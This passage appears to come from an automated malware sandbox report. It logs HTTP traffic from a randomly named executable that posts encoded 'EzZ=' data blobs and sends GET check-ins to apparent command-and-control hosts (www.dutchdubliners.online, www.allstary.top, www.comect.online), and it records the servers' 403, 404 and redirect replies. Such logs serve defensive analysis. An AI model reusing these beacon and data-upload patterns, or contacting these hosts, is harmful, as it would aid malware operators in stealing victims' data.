Data Ascii: EzZ=btqA5+XgDXnu/wcvzFWS3snU9pyy8oA1BJuljvJ4V6ochdilVWmeK0VC46T7s40oZ+IT1iGl8j7vIDXzAmummpqjKsfjX9RDlK2/fwIKDySdXttJ+23EAJhnFzNe9UkxAI1NhVUpDsp1HlynCuF1uS2k0fcS6BVX+CVmE0sr8lzDlmUaTadn2q7ZIPi2Gn0PdQ==
Jan 10, 2025 19:47:29.200200081 CET | 188 | IN | HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html
Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 50018 | 37.97.254.27 | 80 | 5780 | C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:47:31.132036924 CET | 799 | OUT | POST /7ujc/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Host: www.dutchdubliners.online
Origin: http://www.dutchdubliners.online
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Referer: http://www.dutchdubliners.online/7ujc/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Raw: 45 7a 5a 3d 62 74 71 41 35 2b 58 67 44 58 6e 75 35 54 55 76 78 69 4b 53 6d 38 6e 58 79 4a 79 79 32 49 41 70 42 4a 71 6c 6a 72 51 2f 4a 59 4d 63 76 63 53 6c 55 55 4f 65 48 55 56 43 7a 61 54 36 78 6f 30 6a 5a 2f 30 6c 31 67 69 6c 38 67 48 76 49 42 50 7a 44 58 75 6c 30 70 71 68 52 63 66 39 49 74 52 44 6c 4b 32 2f 66 30 68 76 44 79 4b 64 55 64 39 4a 2f 58 33 46 4b 70 68 6d 4e 54 4e 65 73 6b 6b 31 41 49 31 37 68 51 39 30 44 75 52 31 48 6e 36 6e 42 2f 46 30 6b 53 32 59 70 50 63 45 7a 6c 59 4d 7a 69 45 4a 44 33 38 36 33 46 2f 2b 6b 67 5a 41 43 72 38 77 6b 71 66 71 56 49 72 43 4c 6b 4a 47 47 63 73 39 4d 5a 31 52 39 4d 69 72 43 68 47 56 54 69 57 65 55 64 49 3d
Data Ascii: EzZ=btqA5+XgDXnu5TUvxiKSm8nXyJyy2IApBJqljrQ/JYMcvcSlUUOeHUVCzaT6xo0jZ/0l1gil8gHvIBPzDXul0pqhRcf9ItRDlK2/f0hvDyKdUd9J/X3FKphmNTNeskk1AI17hQ90DuR1Hn6nB/F0kS2YpPcEzlYMziEJD3863F/+kgZACr8wkqfqVIrCLkJGGcs9MZ1R9MirChGVTiWeUdI=
Jan 10, 2025 19:47:31.713006973 CET | 188 | IN | HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html
Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 50019 | 37.97.254.27 | 80 | 5780 | C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:47:33.679908991 CET | 10881 | OUT | POST /7ujc/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Host: www.dutchdubliners.online
Origin: http://www.dutchdubliners.online
Content-Length: 10300
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Referer: http://www.dutchdubliners.online/7ujc/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Raw: 45 7a 5a 3d 62 74 71 41 35 2b 58 67 44 58 6e 75 35 54 55 76 78 69 4b 53 6d 38 6e 58 79 4a 79 79 32 49 41 70 42 4a 71 6c 6a 72 51 2f 4a 59 45 63 76 75 61 6c 56 31 4f 65 49 30 56 43 74 71 54 33 78 6f 30 45 5a 2b 63 35 31 67 65 66 38 6c 44 76 4a 6b 62 7a 55 56 47 6c 2b 70 71 68 5a 38 66 38 58 39 52 73 6c 4f 62 58 66 77 46 76 44 79 4b 64 55 65 56 4a 32 6d 33 46 4d 70 68 6e 46 7a 4e 6f 39 55 6c 53 41 49 73 4f 68 51 77 44 43 66 78 31 48 45 53 6e 41 4a 52 30 73 53 32 61 71 50 64 48 7a 69 51 70 7a 6a 6f 76 44 30 67 51 33 48 6a 2b 6b 68 6b 4a 54 34 63 50 2f 38 50 51 50 34 76 78 54 48 68 67 48 2f 64 47 45 5a 6c 64 6e 34 75 47 59 78 69 46 57 41 75 48 49 6f 55 4f 37 67 68 69 74 61 57 6e 4e 58 63 73 50 4b 49 6a 42 73 63 47 71 67 59 32 49 44 6f 39 4a 72 33 35 2b 43 39 33 68 61 39 61 46 65 38 56 53 77 58 6f 79 50 79 6c 65 2f 46 6f 4c 4f 63 65 56 6b 56 79 6b 50 55 48 64 74 38 4f 52 76 76 6f 6e 4b 70 4f 2b 7a 6c 46 66 6b 50 36 6e 6b 75 59 32 4b 67 57 4d 65 54 6a 41 70 77 53 75 45 46 72 4a 44 4d 46 77 4b 30 6f 30 68 [TRUNCATED]
Data Ascii: EzZ=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 [TRUNCATED]
Jan 10, 2025 19:47:34.298815966 CET | 188 | IN | HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html
Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    12192.168.2.45002037.97.254.27805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:47:36.298125982 CET506OUTGET /7ujc/?EzZ=WvCg6J2jHD6L/TcyvzGm/cLTtunIwZsLDJOR2qctLrwbpbWmV0+8HmEyzKPQy50wJfwN5AO63TK9GRaTVCmcnK6BZOflUZJxlriydXV/Hhy/YqFf922rQpM=&BjRxb=8r70fhQxdN4lRB HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.dutchdubliners.online
                                                                                                                                    Connection: close
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Jan 10, 2025 19:47:36.863960981 CET1236INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 02 Apr 2024 11:23:50 GMT
                                                                                                                                    Server: Apache
                                                                                                                                    Last-Modified: Mon, 04 Mar 2024 08:41:05 GMT
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    X-Varnish: 959150833 34925
                                                                                                                                    Age: 24477826
                                                                                                                                    Via: 1.1 varnish (Varnish/6.1)
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Content-Length: 64674
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 61 73 63 69 69 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 [TRUNCATED]
Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs
Jan 10, 2025 19:47:36.864012957 CET  224  IN
Data Ascii: -6 reserved-nav-left reserved-nav-brand"> <a href="https://transip.nl/" class="reserved-nav-brand-link lang_nl" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://w
Jan 10, 2025 19:47:36.864026070 CET  1236  IN
Data Ascii: ww.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve"> <path class="transip-logo-part" d="M12.7,12.4c-0.1,2.5-0.3,2.8-3.2,2.898H8.7c-2.4-0.1-3.1-0.6-3.1-2.699V6.7h9V4.6h-9V1.8H2.9v2.9H0
Jan 10, 2025 19:47:36.864044905 CET  1236  IN
Data Ascii: .8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/> <path class="transip-logo-part" d="M69.1,5.7C68.2,4.9,66.7,4.4,64.6,4.4H61.2c-2.5,0-4.3,0.3-5.3,1.8V4.6h
Jan 10, 2025 19:47:36.864063025 CET  1236  IN
Data Ascii: <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g> </g> <g>
Jan 10, 2025 19:47:36.864075899 CET  1236  IN
Data Ascii: lang_en hidden" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve"> <path class="transip-l
Jan 10, 2025 19:47:36.864089966 CET  1236  IN
Data Ascii: -4.6,0.5 c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/>
Jan 10, 2025 19:47:36.864101887 CET  552  IN
Data Ascii: 89.4,10.9,88.4,10.4z" /> <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/>
Jan 10, 2025 19:47:36.864115000 CET  1236  IN
Data Ascii: </g> <g> <g> <path class="transip-logo-part" fill="#187DC1" d="M117.3,12.2c0,2.7-1.3,3.1-4,3.1h-4c-2.399,0-4.1-0.399-4.2-3.2
Jan 10, 2025 19:47:36.864126921 CET  1236  IN
Data Ascii: ll="#ae1c28" d="M0 0h512v169.92H0z"/></g></svg> </a> <a href="javascript:switchLanguage('en')" style="margin-left: 8px;" class="reserved-nav-flag"> <svg class="flag-icon" xmlns="h
Jan 10, 2025 19:47:36.869106054 CET  1236  IN
Data Ascii: e=" margin-left: 15px;" rel="nofollow"> <div class="visible-md visible-lg" style="display: inline-block; max-width: 200px; border: 1px solid #2ba3f4; text-transform: uppercase; font-weight: bold; color: #2ba3f4; border-


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
13  192.168.2.4  50021  199.193.6.134  80  5780  C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
Timestamp  Bytes transferred  Direction  Data
Jan 10, 2025 19:47:42.496697903 CET  752  OUT  POST /rdvg/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Host: www.allstary.top
Origin: http://www.allstary.top
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Referer: http://www.allstary.top/rdvg/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Ascii: EzZ=eXfG9uSn/pWBzBP/tRt+38FrSroeitQpsKLADQu7g213jhBe2lzRf//cTXkxEc007xTVV/9mF9dC0F/Ige34z/Ev9H2A7rGdw1hJ684jh61pMTPkQ46hZv43W9KU2EhHstIoY5AZk2D57OAJaxanLVkEqzss7MXK6RToWnF22n5r3GrEoCFPUiWrLSrqyA1CvQ==
Jan 10, 2025 19:47:43.079977989 CET  533  IN  HTTP/1.1 404 Not Found
Date: Fri, 10 Jan 2025 18:47:42 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
14  192.168.2.4  50022  199.193.6.134  80  5780  C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
Timestamp  Bytes transferred  Direction  Data
Jan 10, 2025 19:47:45.103970051 CET  772  OUT  POST /rdvg/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Host: www.allstary.top
Origin: http://www.allstary.top
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Referer: http://www.allstary.top/rdvg/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Ascii: EzZ=eXfG9uSn/pWB1Rf/v2Z+xcFsO7oeoNQtsKHADRqRglR3tjZe3nbRY//cHHl1K80j7xfnV6FmF9JC0HnIhpj/zvEtoX2GmbGdw1hJ68t0h6tpPi/kQaSgH/40R9KUyEhDstIwY74zk1757L8JajygEVkCuztboe+o7AmHV2ts1GRX7gme5zkYGiyYWVie/DIL0envdKBlUbxZSxBOwHMwudM=
Jan 10, 2025 19:47:45.670983076 CET  533  IN  HTTP/1.1 404 Not Found
Date: Fri, 10 Jan 2025 18:47:45 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
15  192.168.2.4  50023  199.193.6.134  80  5780  C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
Timestamp  Bytes transferred  Direction  Data
Jan 10, 2025 19:47:47.839987993 CET  10854  OUT  POST /rdvg/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Host: www.allstary.top
Origin: http://www.allstary.top
Content-Length: 10300
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Referer: http://www.allstary.top/rdvg/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Ascii: EzZ=eXfG9uSn/pWB1Rf/v2Z+xcFsO7oeoNQtsKHADRqRglZ3tQRe3BTRZ//cEHl2K81h7x3jV75YF+xC0i7Io4j/8vEt3n2H7rHVw1xN6890h6tpPhXkHY6gF/43W9LV2EgkstQKY78JlFb57vgJcWGgNVkApztDoeie7A6hV2pS1FNX4Wrn+BYCEzyjBHC1+DxK6d7aZo1eAvlaRwscuVYl/ofLmEAswwMkUEYKlHELa+HLeeg2TO3sjDNs86F65ENj3RT3GgxO7K9ol5EK3A6L10UOdrn9RtGdQi4OXGlDdYTo9HJPYgrjgTzXHt+46DALx8fC71kBjvwrR0KVbv4zKP2R/V8B8alHkGlnubr2vbgV7l1yLgURFCmXfEq+Jwv6W5ze5+jff32FWQfyYGHNklKBNodBXo4f19M/JROR8WqyeTPBTh5WkMhSdirPel+4yAJ4OpROqn6PocVK359kgOMbhBGZXt6B1vKNxPmFGEdeJcTz/pXJDgOZIXDZEyt6HgNxjS8zVKEHOoVX0DLIMroT4H6pvz4bfh1lgHYR3RPg6Gx1rQ2AuGSTsiszNbo9Dn9ep9pAA2YWS4TfZboLdjNYuX/5wnIMYq+3dPIG0hZkVn5iGdmdWkM5/9r6TVsnLQbsOCCaBYPzVN57oRwpzruvytjaUm57iTQHRy0g5tsRwzyTi/lWV6+nINLgPYpF+jPjbd7MpgMOH7klxgbTb4cqKZUphEhceQgNAdphg/owR1XgAPLZGFr1YgDNVDDNzG92AIvj4v6oCnttvjy4vgtGguvH6Lu0x6AuQgAyRs/um+bSvsJSxSMWiCH4smci+dV3xIQpjPzW43IgonbiDoEfCOG2vToHd25Met1g5V4Ku7dLuJvL7a/Sy7Xistj+CmyyWEWDIZdCDv425dqwESAK/1TgAxgcdjiaM63/5Inl5Aaxk/qqqeGRKcmwlb8Wi1nkcmT6jqr2SHcUtbR17UE7c1zHPmm09FfPACn4cATCjRqY [TRUNCATED]
Jan 10, 2025 19:47:48.409528017 CET  533  IN  HTTP/1.1 404 Not Found
Date: Fri, 10 Jan 2025 18:47:48 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
16  192.168.2.4  50024  199.193.6.134  80  5780  C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
Timestamp  Bytes transferred  Direction  Data
Jan 10, 2025 19:47:50.488270998 CET  497  OUT  GET /rdvg/?EzZ=TV3m+ZuR+MuvljvWunhewpdSMahlra0ppdriKzCX4142lV8I6FTOceHwOQEpd9UFqQTrUY1AGfMzy32q1OrbtcsJ52Sl7Z/04EVens9SqotHLWuAZYLLbuM=&BjRxb=8r70fhQxdN4lRB HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.allstary.top
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Jan 10, 2025 19:47:51.047204971 CET  548  IN  HTTP/1.1 404 Not Found
Date: Fri, 10 Jan 2025 18:47:50 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=utf-8
                                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 17 | Source IP: 192.168.2.4 | Source Port: 50025 | Destination IP: 124.6.61.130 | Destination Port: 80 | PID: 5780 | Process: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
Timestamp: Jan 10, 2025 19:48:08.609489918 CET | Bytes transferred: 755 | Direction: OUT | Data: POST /hmf8/ HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.comect.online
                                                                                                                                    Origin: http://www.comect.online
                                                                                                                                    Content-Length: 200
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Referer: http://www.comect.online/hmf8/
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Ascii: EzZ=kEYc/tKW9nCWmMEZsVpt8ABwAZdujcD1CFSNPr+4KMDWse1CDxjywT/FHMeht1ffUHYNRg0UgbmydxKiOGg78KOkIDIngdnygaG+jwMwxwN1Drga7SQV7hkqGKLrF47Eysy4fPvi/wCc03OryMzIrJxx8gGJ35BzA2R1mIcFVb1b3zXwHFspuuvyfSxUptvwAA==


Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 50026 | Destination IP: 124.6.61.130 | Destination Port: 80 | PID: 5780 | Process: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
Timestamp: Jan 10, 2025 19:48:11.163376093 CET | Bytes transferred: 775 | Direction: OUT | Data: POST /hmf8/ HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.comect.online
                                                                                                                                    Origin: http://www.comect.online
                                                                                                                                    Content-Length: 220
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Referer: http://www.comect.online/hmf8/
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Ascii: EzZ=kEYc/tKW9nCWluQZrGBt7gBxP5duo8DxCFeNPoyRK6rWs6lCAwjyzT/FNsekuFfUUHUzRg4UgaCydzSiO1448aOmWjIlu9nygaG+jwptx0p1Dawa6zQW2BkrBKLrB47IyszvfLvY/2Oc0yKry5HXl5wb2AHX/MoRPGcFhIclS4hby1aqW0N+8uLBCV4gkuS5bLstyg6UBMM3BPF6Z0dWE4s=


Session ID: 19 | Source IP: 192.168.2.4 | Source Port: 50027 | Destination IP: 124.6.61.130 | Destination Port: 80 | PID: 5780 | Process: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
Timestamp: Jan 10, 2025 19:48:13.742569923 CET | Bytes transferred: 10857 | Direction: OUT | Data: POST /hmf8/ HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.comect.online
                                                                                                                                    Origin: http://www.comect.online
                                                                                                                                    Content-Length: 10300
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Referer: http://www.comect.online/hmf8/
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Ascii: EzZ=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 [TRUNCATED]


Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 50028 | Destination IP: 124.6.61.130 | Destination Port: 80 | PID: 5780 | Process: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
Timestamp: Jan 10, 2025 19:48:16.282807112 CET | Bytes transferred: 498 | Direction: OUT | Data: GET /hmf8/?EzZ=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ=&BjRxb=8r70fhQxdN4lRB HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.comect.online
                                                                                                                                    Connection: close
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Timestamp: Jan 10, 2025 19:48:18.383856058 CET | Bytes transferred: 468 | Direction: IN | Data: HTTP/1.1 301 Moved Permanently
                                                                                                                                    Date: Fri, 10 Jan 2025 18:48:16 GMT
                                                                                                                                    Server: Apache
                                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                    X-Redirect-By: WordPress
                                                                                                                                    Location: http://comect.online/hmf8/?EzZ=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ=&BjRxb=8r70fhQxdN4lRB
                                                                                                                                    Content-Length: 0
                                                                                                                                    Connection: close
                                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                                    Target ID:0
                                                                                                                                    Start time:13:45:10
